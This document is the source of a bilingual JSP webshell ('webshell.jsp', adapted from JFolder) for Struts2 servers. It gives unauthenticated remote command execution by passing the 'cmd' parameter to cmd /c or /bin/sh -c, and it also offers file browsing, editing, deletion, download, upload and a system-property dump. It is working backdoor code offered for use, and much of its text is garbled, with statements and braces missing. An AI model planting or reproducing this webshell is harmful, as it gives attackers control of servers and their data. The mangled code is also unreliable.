
    websell V1.1  windows platform
    @Filename: webshell.jsp
    String mp=strCmd ;//增加临时变量,设置成空串,结束时再转化回原值
<%@page contentType="text/html;charset=utf-8"%>
<%@page import="java.io.*,java.util.*" %>
<!--  因struts2拦截,所以须MultiPartRequestWrapper,原request.getInputStream()无法读取数据 -->

<%@page import="org.apache.struts2.dispatcher.multipart.*" %>
<%!private final static int languageNo = 0; //Language,0 : Chinese; 1:English
 String strThisFile = "";
 String strSeparator = File.separator;
 String[] authorInfo = { " <font color=red> JFolder改编版 by 盛璐禕</font>",
   " <font color=red>  </font>" };
 String[] strFileManage = { "文 件 管 理", "File Management" };
 String[] strCommand = { "CMD 命 令", "Command Window" };
 String[] strSysProperty = { "系 统 属 性", "System Property" };
 String[] strHelp = { "帮 助", "Help" };
 String[] strParentFolder = { "上级目录", "Parent Folder" };
 String[] strCurrentFolder = { "当前目录", "Current Folder" };
 String[] strDrivers = { "驱动器", "Drivers" };
 String[] strFileName = { "文件名称", "File Name" };
 String[] strFileSize = { "文件大小", "File Size" };
 String[] strLastModified = { "最后修改", "Last Modified" };
 String[] strFileOperation = { "文件操作", "Operations" };
 String[] strFileEdit = { "修改", "Edit" };
 String[] strFileDown = { "下载", "Download" };
 String[] strFileCopy = { "复制", "Move" };
 String[] strFileDel = { "删除", "Delete" };
 String[] strExecute = { "执行", "Execute" };
 String[] strBack = { "返回", "Back" };
 String[] strFileSave = { "保存", "Save" };

  * 删除某个文件夹下的所有文件夹和文件
  * @param delpath String
  * @throws FileNotFoundException
  * @throws IOException
  * @return boolean
 public static boolean deletefile(String delpath)
   throws FileNotFoundException, IOException {
  try {

   File file = new File(delpath);
   if (!file.isDirectory()) {
   } else if (file.isDirectory()) {
    String[] filelist = file.list();
    for (int i = 0; i < filelist.length; i++) {
     File delfile = new File(delpath + "//" + filelist[i]);
     if (!delfile.isDirectory()) {
      System.out.println("path=" + delfile.getPath());
        + delfile.getAbsolutePath());
      System.out.println("name=" + delfile.getName());
     } else if (delfile.isDirectory()) {
      deletefile(delpath + "//" + filelist[i]);


  } catch (FileNotFoundException e) {
   System.out.println("deletefile() Exception:" + e.getMessage());
  return true;

 String formatPath(String p) {
  StringBuffer sb = new StringBuffer();
  for (int i = 0; i < p.length(); i++) {
   if (p.charAt(i) == '//') {
   } else {
  return sb.toString();

  * Converts some important chars (int) to the corresponding html string
 static String conv2Html(int i) {
  if (i == '&')
   return "&amp;";
  else if (i == '<')
   return "&lt;";
  else if (i == '>')
   return "&gt;";
  else if (i == '"')
   return "&quot;";
   return "" + (char) i;

  * Converts a normal string to a html conform string
 static String htmlEncode(String st) {
  StringBuffer buf = new StringBuffer();
  for (int i = 0; i < st.length(); i++) {
  return buf.toString();

 String getDrivers()
  StringBuffer sb = new StringBuffer(strDrivers[languageNo] + ":");
  File roots[] = File.listRoots();
  for (int i = 0; i < roots.length; i++) {
   sb.append("&nbsp;<a href=/"javascript:doForm('','" + roots[i]
     + strSeparator + "','','','1','');/">");
   sb.append(roots[i] + "</a>&nbsp;");
  return sb.toString();

 static String convertFileSize(long filesize) {
  String strUnit = "Bytes";
  String strAfterComma = "";
  int intDivisor = 1;
  if (filesize >= 1024 * 1024) {
   strUnit = "MB";
   intDivisor = 1024 * 1024;
  } else if (filesize >= 1024) {
   strUnit = "KB";
   intDivisor = 1024;
  if (intDivisor == 1)
   return filesize + " " + strUnit;
  strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor;
  if (strAfterComma == "")
   strAfterComma = ".0";
  return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
 String tabID = request.getParameter("tabID");
 String strDir = request.getParameter("path");
 String strAction = request.getParameter("action");
 String strFile = request.getParameter("file");
 String strPath = strDir + strSeparator + strFile;
 String strCmd = request.getParameter("cmd");
 StringBuffer sbEdit = new StringBuffer("");
 StringBuffer sbDown = new StringBuffer("");
 StringBuffer sbCopy = new StringBuffer("");
 StringBuffer sbSaveCopy = new StringBuffer("");
 StringBuffer sbNewFile = new StringBuffer("");
 String strOS = System.getProperty("os.name").toLowerCase();

 if ((tabID == null) || tabID.equals("")) {
  tabID = "1";

 if (strDir == null || strDir.length() < 1) {
  strDir = request.getRealPath("/");

 if (strAction != null && strAction.equals("down")) {
  File downloadfile = new File(strPath);
      + strPath.substring(
        strPath.lastIndexOf("//") + 1, strPath
          .length()) + "/"");
  FileInputStream fileInputStream = new FileInputStream(
  int totalRead = 0;
  int readBytes = 0;
  long fileLen = downloadfile.length();
  byte b[] = new byte[65000];
  while ((long) totalRead < fileLen) {
   readBytes = fileInputStream.read(b);
   totalRead += readBytes;
   response.getOutputStream().write(b, 0, readBytes);
  out = pageContext.pushBody();

 if (strAction != null && strAction.equals("del")) {
  File f = new File(strPath);
 if (strAction != null && strAction.equals("deldir")) {
   File f=new File(strPath);

 if (strAction != null && strAction.equals("edit")) {
   File f = new File(strPath);
   BufferedReader br = new BufferedReader(
     new InputStreamReader(new FileInputStream(f)));
     .append("<form name='frmEdit' action='' method='POST'>/r/n");
     .append("<input type=hidden name=action value=save >/r/n");
   sbEdit.append("<input type=hidden name=path value='"
     + strDir + "' >/r/n");
   sbEdit.append("<input type=hidden name=file value='"
     + strFile + "' >/r/n");
   sbEdit.append("<input type=submit name=save value=' "
     + strFileSave[languageNo] + " '> ");
   sbEdit.append("<input type=button name=goback value=' "
     + strBack[languageNo]
     + " ' οnclick='history.back(-1);'> &nbsp;"
     + strPath + "/r/n");
     .append("<br><textarea rows=30 cols=90 name=content>");
   String line = "";
   while ((line = br.readLine()) != null) {
    sbEdit.append(htmlEncode(line) + "/r/n");
   sbEdit.append("<input type=hidden name=path value="
     + strDir + ">");

 if (strAction != null && strAction.equals("save")) {
  File f = new File(strPath);
  BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(
    new FileOutputStream(f)));
  String strContent = request.getParameter("content") ;
 if (strAction != null && strAction.equals("copy")) {
    .append("<br><form name='frmCopy' action='' method='POST'>/r/n");
    .append("<input type=hidden name=action value=savecopy >/r/n");
  sbCopy.append("<input type=hidden name=path value='" + strDir
    + "' >/r/n");
  sbCopy.append("<input type=hidden name=file value='" + strFile
    + "' >/r/n");
  sbCopy.append("原始文件: " + strPath + "<p>");
    .append("目标文件: <input type=text name=file2 size=40 value='"
      + strDir + "'><p>");
  sbCopy.append("<input type=submit name=save value=' "
    + strFileCopy[languageNo] + " '> ");
  sbCopy.append("<input type=button name=goback value=' "
    + strBack[languageNo]
    + " ' οnclick='history.back(-1);'> <p>&nbsp;/r/n");
 if (strAction != null && strAction.equals("savecopy")) {
  File f = new File(strPath);
  String strDesFile = request.getParameter("file2");
  if (strDesFile == null || strDesFile.equals("")) {
   sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
  } else {
   File f_des = new File(strDesFile);
   if (f_des.isFile()) {
      .append("<p><font color=red>目标文件已存在,不能复制。</font>");
   } else {
    String strTmpFile = strDesFile;
    if (f_des.isDirectory()) {
     if (!strDesFile.endsWith(strSeparator)) {
      strDesFile = strDesFile + strSeparator;
     strTmpFile = strDesFile + "copy of " + strFile;

    File f_des_copy = new File(strTmpFile);
    FileInputStream in1 = new FileInputStream(f);
    FileOutputStream out1 = new FileOutputStream(f_des_copy);
    byte[] buffer = new byte[1024];
    int c;
    while ((c = in1.read(buffer)) != -1) {
     out1.write(buffer, 0, c);

    sbSaveCopy.append("原始文件 :" + strPath + "<p>");
    sbSaveCopy.append("目标文件 :" + strTmpFile + "<p>");
    sbSaveCopy.append("<font color=red>复制成功!</font>");
    .append("<p><input type=button name=saveCopyBack οnclick='history.back(-2);' value=返回>");
 if (strAction != null && strAction.equals("newFile")) {
  String strF = request.getParameter("fileName");
  if (!(strF == null || strF.equals(""))) {
   File f_new = new File(strF);
   if (!f_new.mkdirs())
    sbNewFile.append(strF + " 目录创建失败");
  } else {
   sbNewFile.append("<p><font color=red>请输入完整路径及文件夹名称</font>");
 //multipart以此确认是上传的.action   upload  strAction.equals("upload")
 if ((request.getContentType() != null)
   && (request.getContentType().toLowerCase()
     .startsWith("multipart"))) {
  MultiPartRequestWrapper mpRequest = (MultiPartRequestWrapper) request;
  File[] files = mpRequest.getFiles("cqqUploadFile");
  String[] names = mpRequest.getFileNames("cqqUploadFile");
  String path = mpRequest.getParameter("path");
  if (path != null && !path.endsWith(strSeparator))
   path = path + strSeparator;

  for (int i = 0; i < names.length; i++) {
   File fl = files[i];
    File fdes=new File(path + names[i]);
    FileInputStream in1 = new FileInputStream(fl);
    BufferedReader br = new BufferedReader(new InputStreamReader(in1,"gbk"));
    FileOutputStream out1 = new FileOutputStream(path + names[i]);
    Writer writer = new OutputStreamWriter(out1,"utf-8");
    char[] buffer = new char[1024];
    int c;
    while ((c = br.read(buffer)) != -1) {
     writer.write(buffer, 0, c);
<style type="text/css">

padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;

#tablist li{
list-style: none;
display: inline;
margin: 0;

#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;

#tablist li a:link, #tablist li a:visited{
color: navy;

#tablist li a.current{
background: #EAEAFF;

width: 100%;
padding: 5px;
border: 1px solid black;



<script type="text/javascript">

var initialtab=[<%=tabID%>, "menu<%=tabID%>"]

Stop editting

function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)

var previoustab=""

function expandcontent(cid, aobject){

if (document.getElementById){
if (previoustab!="")
if (aobject.blur)
return false
return true

function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
for (i=0; i<tabobjlinks.length; i++)
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor

function collecttablinks(){
var tabobj=document.getElementById("tablist")

function do_onload(){
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])

if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)


<script language="javascript">

function doForm(action,path,file,cmd,tab,content)
  if(confirm("确定要删除文件 "+file+" 吗?"))
 else if(action=="deldir")
  if(confirm("确定要删除文件夹 "+file+" 吗?"))



<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">

<!--Top Menu Started-->
<ul id="tablist">
<li><a href="#" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="#" onClick="return expandcontent('menu2', this)"> <%=strCommand[languageNo]%> </a></li>
<li><a href="#" onClick="return expandcontent('menu3', this)"> <%=strSysProperty[languageNo]%> </a></li>
<!--Top Menu End-->

 StringBuffer sbFolder = new StringBuffer("");
 StringBuffer sbFile = new StringBuffer("");
 int filenum = 0;
 String filelen = "";
 long filelong = 0;

 String mp = strCmd;
 strCmd = null;
 try {
  File objFile = new File(strDir);
  File list[] = objFile.listFiles();
  if (objFile.getAbsolutePath().length() > 3) {
     .append("<tr><td >&nbsp;</td><td><a href=/"javascript:doForm('','"
       + formatPath(objFile.getParentFile()
       + "','','"
       + strCmd + "','1','');/">");
     + "</a><br>- - - - - - - - - - - </td></tr>/r/n ");

  for (int i = 0; i < list.length; i++) {
   if (list[i].isDirectory()) {
    sbFolder.append("<tr><td >&nbsp;</td><td>");
    sbFolder.append("  <a href=/"javascript:doForm('','"
      + formatPath(list[i].getAbsolutePath())
      + "','','" + strCmd + "','1','');/">");
      + "</a><br></td></tr> ");
    String strLen = "";
    String strDT = "";
    long lFile = 0;
    lFile = list[i].length();
    filelong += lFile;
    strLen = convertFileSize(lFile);
    Date dt = new Date(list[i].lastModified());
    strDT = dt.toLocaleString();
      .append("<tr bgcolor='#FBFF06' οnmοuseοver=/"this.style.backgroundColor='#FBFFC6'/" οnmοuseοut=/"this.style.backgroundColor='#FBFF06'/"><td>");
    sbFile.append("" + list[i].getName());
    sbFile.append("" + strLen);
    sbFile.append("" + strDT);

    sbFile.append(" <a href=/"javascript:doForm('deldir','"
      + formatPath(strDir) + "','"
      + list[i].getName() + "','" + strCmd + "','"
      + tabID + "','');/">");
    sbFile.append(strFileDel[languageNo] + "</a> ");

   } else {
    String strLen = "";
    String strDT = "";
    long lFile = 0;
    lFile = list[i].length();
    filelong += lFile;
    strLen = convertFileSize(lFile);
    Date dt = new Date(list[i].lastModified());
    strDT = dt.toLocaleString();
      .append("<tr οnmοuseοver=/"this.style.backgroundColor='#FBFFC6'/" οnmοuseοut=/"this.style.backgroundColor='white'/"><td>");
    sbFile.append("" + list[i].getName());
    sbFile.append("" + strLen);
    sbFile.append("" + strDT);

    sbFile.append(" <a href=/"javascript:doForm('edit','"
      + formatPath(strDir) + "','"
      + list[i].getName() + "','" + strCmd + "','"
      + tabID + "','');/">");
    sbFile.append(strFileEdit[languageNo] + "</a> ");

    sbFile.append(" <a href=/"javascript:doForm('del','"
      + formatPath(strDir) + "','"
      + list[i].getName() + "','" + strCmd + "','"
      + tabID + "','');/">");
    sbFile.append(strFileDel[languageNo] + "</a> ");

    sbFile.append(" <a href=/"javascript:doForm('down','"
      + formatPath(strDir) + "','"
      + list[i].getName() + "','" + strCmd + "','"
      + tabID + "','');/">");
    sbFile.append(strFileDown[languageNo] + "</a> ");

    sbFile.append(" <a href=/"javascript:doForm('copy','"
      + formatPath(strDir) + "','"
      + list[i].getName() + "','" + strCmd + "','"
      + tabID + "','');/">");
    sbFile.append(strFileCopy[languageNo] + "</a> ");

  //fjfdszj modif debug
  strCmd = mp;

  if (filelong > 1000000) {
   filelong = filelong / 1000000;
   filelen = "<font color=#FF0000>" + filelong + "</font> M";
  } else if (filelong > 1000) {
   filelong = filelong / 1000;
   filelen = "<font color=#FF0000>" + filelong + "</font> K";
  } else {
   filelen = "<font color=#FF0000>" + filelong
     + "</font> Byte";
 } catch (Exception e) {
    .println("<font color=red>操作失败: " + e.toString()
      + "</font>");

<DIV id="tabcontentcontainer">

<div id="menu3" class="tabcontent">
 Properties props = System.getProperties();
   <table cellpadding="0" cellspacing="0" border="0">
     <td><h1><%=props.getProperty("user.name")%> Operation System</h1><br></td>
  out.println("<h3>操作系统的名称:" + props.getProperty("os.name") + "  构架:"
    + props.getProperty("os.arch") + "  版本:"
    + props.getProperty("os.version") + "</h3>");

  out.println("用户的账户名称:" + props.getProperty("user.name") + "<br>");
  out.println("用户的主目录:" + props.getProperty("user.home") + "<br>");

  out.println("用户的当前工作目录:" + props.getProperty("user.dir") + "<br>");

  out.println("Java的运行环境版本:" + props.getProperty("java.version")
    + "<br>");
  out.println("Java的运行环境供应商:" + props.getProperty("java.vendor")
    + "<br>");
  out.println("Java供应商的URL:" + props.getProperty("java.vendor.url")
    + "<br>");
  out.println("Java的安装路径:" + props.getProperty("java.home") + "<br>");
    + props.getProperty("java.vm.specification.version")
    + "<br>");
    + props.getProperty("java.vm.specification.vendor")
    + "<br>");
    + props.getProperty("java.vm.specification.name") + "<br>");
  out.println("Java的虚拟机实现版本:" + props.getProperty("java.vm.version")
    + "<br>");
  out.println("Java的虚拟机实现供应商:" + props.getProperty("java.vm.vendor")
    + "<br>");
  out.println("Java的虚拟机实现名称:" + props.getProperty("java.vm.name")
    + "<br>");
    + props.getProperty("java.specification.version") + "<br>");
    + props.getProperty("java.specification.vender") + "<br>");
    + props.getProperty("java.specification.name") + "<br>");
    + props.getProperty("java.class.version") + "<br>");
  out.println("Java的类路径:" + props.getProperty("java.class.path")
    + "<br>");
  out.println("加载库时搜索的路径列表:" + props.getProperty("java.library.path")
    + "<br>");
  out.println("默认的临时文件路径:" + props.getProperty("java.io.tmpdir")
    + "<br>");
  out.println("一个或多个扩展目录的路径:" + props.getProperty("java.ext.dirs")
    + "<br>");

    .println("文件分隔符:" + props.getProperty("file.separator")
      + "<br>"); //在 unix 系统中是"/"   
    .println("路径分隔符:" + props.getProperty("path.separator")
      + "<br>"); //在 unix 系统中是":"   
  out.println("行分隔符:" + props.getProperty("line.separator") + "<br>");

<div id="menu4" class="tabcontent">

<br><div id="menu1" class="tabcontent">
   .println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td>"
     + getDrivers() + "</td></tr></table>/r/n");
   .println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"
     + strCurrentFolder[languageNo]
     + ":"
     + strDir
     + "</td></tr></table>/r/n");
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
          <td width="25%" align="center" valign="top">
              <table width="98%" border="0" cellspacing="0" cellpadding="3">
          <td width="81%" align="left" valign="top">
   if (strAction != null && strAction.equals("edit")) {
   } else if (strAction != null && strAction.equals("copy")) {
   } else if (strAction != null && strAction.equals("down")) {
   } else if (strAction != null && strAction.equals("savecopy")) {
   } else if (strAction != null && strAction.equals("newFile")
     && !sbNewFile.toString().equals("")) {
   } else {
  <span id="EditBox"><table width="100%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
              <tr bgcolor="#E7e7e6">
                <td width="30%"><%=strFileName[languageNo]%><br><br></td>
                <td width="20%"><%=strFileSize[languageNo]%><br><br></td>
                <td width="25%"><%=strLastModified[languageNo]%><br><br></td>
                <td width="25%"><%=strFileOperation[languageNo]%><br><br></td>
              <tr align="center">
                <td colspan="4"><br>
                  总计文件个数:<font color="#FF0000"><%=filenum%></font> ,大小:<%=filelen%><br></td>

 <tr><td colspan=2 bgcolor=#FBFFC6>
 <form name="frmMake" action="" method="post" style="margin: 0px">
 <input type="hidden" name="action" value="newFile">
 <input type="hidden" name="path" value="<%=strDir%>">
 <input type="hidden" name="file" value="<%=strFile%>">
 <input type="hidden" name="cmd" value="<%=strCmd%>">
 <input type="hidden" name="tabID" value="1">
 <input type="hidden" name="content" value="">
  if (!strDir.endsWith(strSeparator))
   strDir = strDir + strSeparator;
 <input type="text" name="fileName" size=50 value="<%=strDir%>">
 <input type="submit" name="btnNewDir" value="新建目录">
 <form name="frmUpload"  enctype="multipart/form-data" action="" method="post" style="margin: 0px">
 <input type="hidden" name="action" value="upload">
 <input type="hidden" name="path" value="<%=strDir%>">
 <input type="hidden" name="file" value="<%=strFile%>">
 <input type="hidden" name="cmd" value="<%=strCmd%>">
 <input type="hidden" name="tabID" value="1">
 <input type="hidden" name="content" value="">
 <input type="file" name="cqqUploadFile" size="50">
 <input type="submit" name="submit" value="上传">
<div id="menu2" class="tabcontent">

 String line = "";
 StringBuffer sbCmd = new StringBuffer("");

 if (strCmd != null) {
  try {
   String[] strShell = new String[2];
   if (strOS.startsWith("win")) {
    strShell[0] = "cmd";
    strShell[1] = "/c";
   } else {
    strShell[0] = "/bin/sh";
    strShell[1] = "-c";
   String[] strCommand = new String[3];
   strCommand[0] = strShell[0];
   strCommand[1] = strShell[1];
   strCommand[2] = strCmd;
   Process p = Runtime.getRuntime().exec(strCommand, null,
     new File(strDir));
   BufferedReader br = new BufferedReader(
     new InputStreamReader(p.getInputStream()));
   while ((line = br.readLine()) != null) {
    sbCmd.append(line + "/r/n");
  } catch (Exception e) {
 } else {
  strCmd = "set";
<form name="cmd" action="" method="post">
<input type="text" id="cmdvalue" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="path" value="<%=strDir%>">
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
 if (sbCmd != null && sbCmd.toString().trim().equals("") == false) {
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br><br><center><a href="http://www.17dmt.com" target="_blank">数字营销网络学院</a> ,All Rights Reserved.
<br>Any question, please email me






